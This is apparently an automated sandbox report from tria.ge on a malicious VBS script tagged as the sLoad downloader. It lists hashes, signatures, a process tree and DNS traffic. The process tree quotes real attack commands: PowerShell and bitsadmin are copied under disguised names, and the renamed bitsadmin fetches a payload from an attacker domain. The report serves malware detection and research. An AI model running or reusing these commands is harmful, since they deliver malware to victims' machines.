Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    30s
  • max time network
    28s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01/03/2021, 22:54 UTC

General

  • Target

    00SBLFNC71R18D160W.vbs

  • Size

    699B

  • MD5

    70053c798a635f12c002e57eacb3bd26

  • SHA1

    4cbe4c33fc5f44265e15bb6e583f46c878a97341

  • SHA256

    43202b6bcac9d8c195da84abee91ebd15ee80337421dc6e0eaa1c2e1481bb123

  • SHA512

    62652ceb291614da3b19be434fe3db7f1777e080b3e030c370cea1112dbd81a677a917ef356265bdeed732af89ebab6760cd7996179a477fe595ae4795402c69

Score
10/10

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\00SBLFNC71R18D160W.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1828
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\aREepkDUA.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\lALIBfV*.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\aREepkDUA.exe
        3⤵
        PID:1096
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\lALIBfV*.exe
        3⤵
        PID:1160
    • C:\ProgramData\lALIBfVin.exe
      "C:\ProgramData\lALIBfVin.exe" /wrap /transfer wyajDGCI https://agaux.com/ogoksi/SBLFNC71R18D160W/developer.txt C:\ProgramData\developer.txt
      2⤵
      • Executes dropped EXE
      PID:1948

Network

  • DNS
    agaux.com
    Remote address: 8.8.8.8:53
    Request: agaux.com IN A
    Response: agaux.com IN A 185.156.172.44
  • 185.156.172.44:443  agaux.com  152 B  3
  • 8.8.8.8:53  agaux.com  dns  55 B  71 B  1  1

    DNS Request
    agaux.com

    DNS Response
    185.156.172.44

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1828-2-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp
    Filesize: 8KB
  • memory/1948-9-0x0000000076101000-0x0000000076103000-memory.dmp
    Filesize: 8KB
